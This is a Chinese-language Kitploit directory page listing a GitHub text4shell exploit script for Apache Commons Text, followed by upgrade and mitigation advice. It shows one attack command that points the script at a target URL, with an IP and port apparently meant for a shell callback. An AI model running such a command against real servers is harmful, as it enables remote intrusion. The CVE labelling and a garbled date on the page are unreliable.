Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
riskootext4shell — 用于 text coomons <=1.10 的 text4shell 脚本(CVE-2022-33980) | Kitploit
工具/GitHubGitHub/joseluisinigo/riskootext4shell
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubjoseluisinigo/riskootext4shell

riskootext4shell

用于 text coomons <=1.10 的 text4shell 脚本(CVE-2022-33980)

查看仓库
113年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

riskootext4shell

text4shell script for text coomons < =1.10 CVE-2022-33980

  • Apache Commons Text 库是 Java JDK 原生功能的替代库。
  • Apache Commons 的版本低于 1.10.0
  • 类似于 CVE-2022-33980
root@kitploit:~
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22

缓解措施

主要解决方案是紧急升级 Apache Commons Text 组件至修复此漏洞的可用版本。具体来说,应升级至 Apache Commons Text 1.10.0 或更高版本。

在此更新中,默认禁用了那些有问题的替换功能。库的 changelog 文件中包含了以下更改:

Make default string lookups configurable vía system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled vía system property. See StringLookupFactory for details.

Apache 已发布公告,包含官方信息以及对修复该问题的更新的引用。

下载工具